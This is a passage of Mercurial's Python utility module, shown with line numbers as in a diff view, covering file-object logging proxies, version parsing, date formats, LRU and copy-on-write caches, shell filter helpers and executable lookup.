    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)
652
652
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        # Report the low-level read the superclass just performed, if the
        # observer cares about ``osread`` events.
        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res
692
692
# Map every byte to its hex-escaped form, then override the bytes that
# have conventional short escapes.
DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
DATA_ESCAPE_MAP.update({
    b'\\': b'\\\\',
    b'\r': br'\r',
    b'\n': br'\n',
})
# Bytes that need escaping: control characters (except tab, \x09),
# backslash, and non-ASCII bytes.
DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
700
700
def escapedata(s):
    """Return ``s`` with special bytes replaced by escaped representations.

    Bytes matched by DATA_ESCAPE_RE are replaced using DATA_ESCAPE_MAP.
    """
    def _escape(match):
        return DATA_ESCAPE_MAP[match.group(0)]
    return DATA_ESCAPE_RE.sub(_escape, s)
703
703
class fileobjectobserver(object):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False):
        self.fh = fh            # file-like object receiving log output
        self.name = name        # label prefixed to every log line
        self.logdata = logdata  # whether to log payload data as well
        self.reads = reads
        self.writes = writes

    def _writedata(self, data):
        # Without data logging, just terminate the summary line.
        if not self.logdata:
            self.fh.write('\n')
            return

        if b'\n' in data:
            # Data containing newlines is written across multiple lines,
            # one source line per output line.
            self.fh.write(':\n')
            for line in data.splitlines(True):
                self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
        else:
            # The simple case: all data fits on a single line.
            self.fh.write(': %s\n' % escapedata(data))

    def read(self, res, size=-1):
        if self.reads:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
            self._writedata(res)

    def readline(self, res, limit=-1):
        if self.reads:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
            self._writedata(res)

    def write(self, res, data):
        if self.writes:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
            self._writedata(data)

    def flush(self, res):
        if self.writes:
            self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        self.fh.write('%s> bufferedread(%d) -> %d' % (
            self.name, size, len(res)))
        self._writedata(res)

    def bufferedreadline(self, res):
        self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
        self._writedata(res)
765
765
def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False):
    """Turn a file object into a logging file object.

    ``fh`` is wrapped in a fileobjectproxy whose observer writes activity
    for ``fh`` (labeled ``name``) to ``logh``.
    """
    return fileobjectproxy(
        fh,
        fileobjectobserver(logh, name, reads=reads, writes=writes,
                           logdata=logdata))
773
773
def version():
    """Return version information if available."""
    try:
        from . import __version__
    except ImportError:
        # No generated version module (e.g. running from a source
        # checkout without a build step).
        return 'unknown'
    return __version__.version
781
781
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # Split off the "extra" part at the first '+' or '-'.  Use a raw
    # string: '\+' in a plain string is an invalid escape sequence
    # (deprecated; previously relied on the silent-fallback behavior).
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # Stop at the first non-numeric component (e.g. 'rc').
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
850
850
# used by parsedate: strptime()-style formats, tried in this order
defaultdateformats = (
    '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
    '%Y-%m-%dT%H:%M', # without seconds
    '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
    '%Y-%m-%dT%H%M', # without seconds
    '%Y-%m-%d %H:%M:%S', # our common legal variant
    '%Y-%m-%d %H:%M', # without seconds
    '%Y-%m-%d %H%M%S', # without :
    '%Y-%m-%d %H%M', # without seconds
    '%Y-%m-%d %I:%M:%S%p',
    '%Y-%m-%d %H:%M',
    '%Y-%m-%d %I:%M%p',
    '%Y-%m-%d',
    '%m-%d',
    '%m/%d',
    '%m/%d/%y',
    '%m/%d/%Y',
    '%a %b %d %H:%M:%S %Y',
    '%a %b %d %I:%M:%S%p %Y',
    '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
    '%b %d %H:%M:%S %Y',
    '%b %d %I:%M:%S%p %Y',
    '%b %d %H:%M:%S',
    '%b %d %I:%M:%S%p',
    '%b %d %H:%M',
    '%b %d %I:%M%p',
    '%b %d %Y',
    '%b %d',
    '%H:%M:%S',
    '%I:%M:%S%p',
    '%H:%M',
    '%I:%M%p',
)
885
885
# defaultdateformats plus coarser, date-only variants (year/month only)
extendeddateformats = defaultdateformats + (
    "%Y",
    "%Y-%m",
    "%b",
    "%b %Y",
)
892
892
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX keyword arguments are not handled
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # A one-element list doubles as the "computed yet?" flag and the
        # storage for the single cached result.
        results = []
        def f():
            if not results:
                results.append(func())
            return results[0]
        return f
    cache = {}
    if argcount == 1:
        # We gain a small amount of time because we don't need to
        # pack/unpack an argument tuple.
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]
    return f
918
918
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if not getattr(self, '_copied', 0):
            # Nobody shares this object; it is safe to write in place.
            return self
        # One of the outstanding shares is being detached into a real copy.
        self._copied -= 1
        return self.__class__(self)

    def copy(self):
        """always do a cheap copy"""
        # Just count the share; the real copy is deferred to preparewrite.
        self._copied = getattr(self, '_copied', 0) + 1
        return self
936
936
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # Re-setting an existing key moves it to the end of the iteration
        # order: "last set wins" ordering.
        try:
            del self[key]
        except KeyError:
            pass
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # PyPy (as of 5.8.0) does not route update() through __setitem__,
        # so reimplement it in terms of our __setitem__.
        def update(self, src):
            items = src.iteritems() if isinstance(src, dict) else src
            for k, v in items:
                self[k] = v
961
961
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
    # cow provides preparewrite()/copy(); dict provides the storage.
987
987
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """
    # cow provides preparewrite()/copy(); sortdict provides last-set-wins
    # ordered storage.
993
993
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            # Only a clean exit commits; when an exception is propagating,
            # close() is skipped so release() aborts the transaction.
            if exc_type is None:
                self.close()
        finally:
            self.release()
1018
1018
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # InterventionRequired is a pause, not a failure: commit what was
        # done so far, then let the exception propagate to the caller.
        tr.close()
        raise
    finally:
        tr.release()
1036
1036
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing (yields None)."""
    yield None
1040
1040
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        # Links are wired up by the owning cache.
        self.next = self.prev = None

        # _notset (not None) marks an empty node, since None is a valid
        # cached value.
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
1059
1059
1060 class lrucachedict(object):
1060 class lrucachedict(object):
1061 """Dict that caches most recent accesses and sets.
1061 """Dict that caches most recent accesses and sets.
1062
1062
1063 The dict consists of an actual backing dict - indexed by original
1063 The dict consists of an actual backing dict - indexed by original
1064 key - and a doubly linked circular list defining the order of entries in
1064 key - and a doubly linked circular list defining the order of entries in
1065 the cache.
1065 the cache.
1066
1066
1067 The head node is the newest entry in the cache. If the cache is full,
1067 The head node is the newest entry in the cache. If the cache is full,
1068 we recycle head.prev and make it the new head. Cache accesses result in
1068 we recycle head.prev and make it the new head. Cache accesses result in
1069 the node being moved to before the existing head and being marked as the
1069 the node being moved to before the existing head and being marked as the
1070 new head node.
1070 new head node.
1071 """
1071 """
1072 def __init__(self, max):
1072 def __init__(self, max):
1073 self._cache = {}
1073 self._cache = {}
1074
1074
1075 self._head = head = _lrucachenode()
1075 self._head = head = _lrucachenode()
1076 head.prev = head
1076 head.prev = head
1077 head.next = head
1077 head.next = head
1078 self._size = 1
1078 self._size = 1
1079 self._capacity = max
1079 self._capacity = max
1080
1080
1081 def __len__(self):
1081 def __len__(self):
1082 return len(self._cache)
1082 return len(self._cache)
1083
1083
1084 def __contains__(self, k):
1084 def __contains__(self, k):
1085 return k in self._cache
1085 return k in self._cache
1086
1086
1087 def __iter__(self):
1087 def __iter__(self):
1088 # We don't have to iterate in cache order, but why not.
1088 # We don't have to iterate in cache order, but why not.
1089 n = self._head
1089 n = self._head
1090 for i in range(len(self._cache)):
1090 for i in range(len(self._cache)):
1091 yield n.key
1091 yield n.key
1092 n = n.next
1092 n = n.next
1093
1093
1094 def __getitem__(self, k):
1094 def __getitem__(self, k):
1095 node = self._cache[k]
1095 node = self._cache[k]
1096 self._movetohead(node)
1096 self._movetohead(node)
1097 return node.value
1097 return node.value
1098
1098
1099 def __setitem__(self, k, v):
1099 def __setitem__(self, k, v):
1100 node = self._cache.get(k)
1100 node = self._cache.get(k)
1101 # Replace existing value and mark as newest.
1101 # Replace existing value and mark as newest.
1102 if node is not None:
1102 if node is not None:
1103 node.value = v
1103 node.value = v
1104 self._movetohead(node)
1104 self._movetohead(node)
1105 return
1105 return
1106
1106
1107 if self._size < self._capacity:
1107 if self._size < self._capacity:
1108 node = self._addcapacity()
1108 node = self._addcapacity()
1109 else:
1109 else:
1110 # Grab the last/oldest item.
1110 # Grab the last/oldest item.
1111 node = self._head.prev
1111 node = self._head.prev
1112
1112
1113 # At capacity. Kill the old entry.
1113 # At capacity. Kill the old entry.
1114 if node.key is not _notset:
1114 if node.key is not _notset:
1115 del self._cache[node.key]
1115 del self._cache[node.key]
1116
1116
1117 node.key = k
1117 node.key = k
1118 node.value = v
1118 node.value = v
1119 self._cache[k] = node
1119 self._cache[k] = node
1120 # And mark it as newest entry. No need to adjust order since it
1120 # And mark it as newest entry. No need to adjust order since it
1121 # is already self._head.prev.
1121 # is already self._head.prev.
1122 self._head = node
1122 self._head = node
1123
1123
1124 def __delitem__(self, k):
1124 def __delitem__(self, k):
1125 node = self._cache.pop(k)
1125 node = self._cache.pop(k)
1126 node.markempty()
1126 node.markempty()
1127
1127
1128 # Temporarily mark as newest item before re-adjusting head to make
1128 # Temporarily mark as newest item before re-adjusting head to make
1129 # this node the oldest item.
1129 # this node the oldest item.
1130 self._movetohead(node)
1130 self._movetohead(node)
1131 self._head = node.next
1131 self._head = node.next
1132
1132
1133 # Additional dict methods.
1133 # Additional dict methods.
1134
1134
1135 def get(self, k, default=None):
1135 def get(self, k, default=None):
1136 try:
1136 try:
1137 return self._cache[k].value
1137 return self._cache[k].value
1138 except KeyError:
1138 except KeyError:
1139 return default
1139 return default
1140
1140
1141 def clear(self):
1141 def clear(self):
1142 n = self._head
1142 n = self._head
1143 while n.key is not _notset:
1143 while n.key is not _notset:
1144 n.markempty()
1144 n.markempty()
1145 n = n.next
1145 n = n.next
1146
1146
1147 self._cache.clear()
1147 self._cache.clear()
1148
1148
1149 def copy(self):
1149 def copy(self):
1150 result = lrucachedict(self._capacity)
1150 result = lrucachedict(self._capacity)
1151 n = self._head.prev
1151 n = self._head.prev
1152 # Iterate in oldest-to-newest order, so the copy has the right ordering
1152 # Iterate in oldest-to-newest order, so the copy has the right ordering
1153 for i in range(len(self._cache)):
1153 for i in range(len(self._cache)):
1154 result[n.key] = n.value
1154 result[n.key] = n.value
1155 n = n.prev
1155 n = n.prev
1156 return result
1156 return result
1157
1157
    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        # The node is now fully linked in front of the old head; crown it.
        self._head = node
1204
1204
1205 def _addcapacity(self):
1205 def _addcapacity(self):
1206 """Add a node to the circular linked list.
1206 """Add a node to the circular linked list.
1207
1207
1208 The new node is inserted before the head node.
1208 The new node is inserted before the head node.
1209 """
1209 """
1210 head = self._head
1210 head = self._head
1211 node = _lrucachenode()
1211 node = _lrucachenode()
1212 head.prev.next = node
1212 head.prev.next = node
1213 node.prev = head.prev
1213 node.prev = head.prev
1214 node.next = head
1214 node.next = head
1215 head.prev = node
1215 head.prev = node
1216 self._size += 1
1216 self._size += 1
1217 return node
1217 return node
1218
1218
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    # Functions of exactly one argument get a cheaper wrapper that uses
    # the argument itself as the cache key; others key on the args tuple.
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg in cache:
                # Known argument: just refresh its recency below.
                order.remove(arg)
            else:
                # Bound the cache at ~21 entries by dropping the oldest.
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args in cache:
                order.remove(args)
            else:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            order.append(args)
            return cache[args]

    return f
1245
1245
class propertycache(object):
    """Non-data descriptor caching the result of ``func`` per instance.

    On first attribute access the wrapped function runs and its result is
    stored in the instance ``__dict__`` under the function's name; later
    lookups then bypass the descriptor entirely.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
1258
1258
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    # pop() with a default is a no-op when the property was never cached.
    obj.__dict__.pop(prop, None)
1263
1263
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    # Feed s on stdin and collect stdout; stderr is left attached to ours.
    out, _err = proc.communicate(s)
    return out
1270
1270
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname = outname = None
    try:
        # Write the input to a temp file for the command to consume.
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        # Pre-create the output file so only its name is handed to cmd.
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        # On OpenVMS an odd status value actually indicates success.
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # Best-effort cleanup of both temp files.
        for name in (inname, outname):
            try:
                if name:
                    os.unlink(name)
            except OSError:
                pass
1304
1304
# Map of filter-spec prefixes to the implementation handling that style
# of filter; anything without a known prefix falls back to pipefilter.
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
    }
1309
1309
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    # Dispatch on a recognized prefix ('tempfile:' or 'pipe:'), stripping
    # the prefix and surrounding whitespace from the actual command.
    for prefix, handler in filtertable.iteritems():
        if cmd.startswith(prefix):
            return handler(s, cmd[len(prefix):].lstrip())
    # No explicit prefix: default to a plain shell pipe.
    return pipefilter(s, cmd)
1316
1316
def binary(s):
    """return true if a string is binary data"""
    # Empty or None input is never considered binary.
    if not s:
        return False
    # Heuristic shared with many tools: a NUL byte marks binary content.
    return '\0' in s
1320
1320
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        # Index of the highest set bit (0 for x == 0).
        if not x:
            return 0
        bits = 0
        while x:
            x >>= 1
            bits += 1
        return bits - 1

    pending = []
    pendinglen = 0
    for chunk in source:
        pending.append(chunk)
        pendinglen += len(chunk)
        if pendinglen < min:
            # Not enough buffered yet; keep accumulating.
            continue
        if min < max:
            # Grow the threshold: at least double it, or jump straight
            # to the magnitude of what we just buffered, capped at max.
            min = min << 1
            nmin = 1 << log2(pendinglen)
            if nmin > min:
                min = nmin
            if min > max:
                min = max
        yield ''.join(pending)
        pending = []
        pendinglen = 0
    if pending:
        # Flush whatever remains, even if below the threshold.
        yield ''.join(pending)
1351
1351
# Convenience alias so util's many callers need not import error directly.
Abort = error.Abort
1353
1353
def always(fn):
    """Matcher predicate accepting every input."""
    return True
1356
1356
def never(fn):
    """Matcher predicate rejecting every input."""
    return False
1359
1359
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # Only re-enable if the caller had GC on to begin with.
            if wasenabled:
                gc.enable()
    return wrapper
1382
1382
if pycompat.ispypy:
    # PyPy runs slower with gc disabled, so make nogc a no-op decorator there.
    nogc = lambda x: x
1386
1386
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        # n1 is absolute: if it lives on a different drive than root
        # (Windows), no relative path exists, so return n2 under root.
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        # Same drive: make n2 absolute too so the prefix-stripping below
        # compares like with like.
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    # Pop the shared leading components off both paths.
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    # Climb out of what remains of n1, then descend into n2.
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1412
1412
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    if safehasattr(sys, "frozen"):  # new py2exe
        return True
    if safehasattr(sys, "importers"):  # old py2exe
        return True
    return imp.is_frozen(u"__main__")  # tools/freeze
1422
1422
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    # running from source: data files live alongside this module
    datapath = os.path.dirname(pycompat.fsencode(__file__))

# point gettext at the translations shipped next to the data files
i18n.setdatapath(datapath)
1431
1431
# Cached path of the 'hg' executable; resolved lazily by hgexecutable().
_hgexecutable = None
1433
1433
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.

    The result is cached in the module-level _hgexecutable on first call.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            # $HG wins over any auto-detection.
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                # py2exe-style bundles: the interpreter *is* hg.
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            # Running directly from an 'hg' script.
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            # Fall back to searching PATH, then to whatever argv[0] says.
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1457
1457
def _sethgexecutable(path):
    """set location of the 'hg' executable

    path is cached in the module-level _hgexecutable consumed by
    hgexecutable() and, indirectly, shellenviron().
    """
    global _hgexecutable
    _hgexecutable = path
1462
1462
1463 def _isstdout(f):
1463 def _isstdout(f):
1464 fileno = getattr(f, 'fileno', None)
1464 fileno = getattr(f, 'fileno', None)
1465 try:
1465 try:
1466 return fileno and fileno() == sys.__stdout__.fileno()
1466 return fileno and fileno() == sys.__stdout__.fileno()
1467 except io.UnsupportedOperation:
1467 except io.UnsupportedOperation:
1468 return False # fileno() raised UnsupportedOperation
1468 return False # fileno() raised UnsupportedOperation
1469
1469
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out

    Values in the optional ``environ`` mapping are converted with
    py2shell (None/False -> '0', True -> '1') and layered on top of the
    process environment; $HG is always set to the hg executable path.
    """
    def py2shell(val):
        'convert python object into string that is useful to shell'
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return pycompat.bytestr(val)
    env = dict(encoding.environ)
    if environ:
        env.update((k, py2shell(v)) for k, v in environ.iteritems())
    # Hooks and filters rely on $HG pointing back at this hg.
    env['HG'] = hgexecutable()
    return env
1484
1484
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.

    Returns the child's exit code (0 forced on OpenVMS success statuses).'''
    try:
        # Flush our own buffered output first so the child's output does
        # not appear interleaved out of order.
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        # Destination is our real stdout: let the child write directly.
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        # Otherwise capture stdout+stderr and copy them line by line
        # into the provided file-like object.
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    # On OpenVMS an odd status actually means success.
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc
1511
1511
def checksignature(func):
    '''wrap a function with code to check for calling errors

    A TypeError raised by the call itself (wrong argument count) is
    converted to error.SignatureError; TypeErrors raised deeper inside
    func propagate unchanged.'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # Traceback depth 1 means the TypeError came from the call
            # frame itself (bad signature), not from func's body.
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check
1523
1523
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1539
1539
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # Remember dest's stat so we can detect mtime ambiguity after
            # the copy replaces it.
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
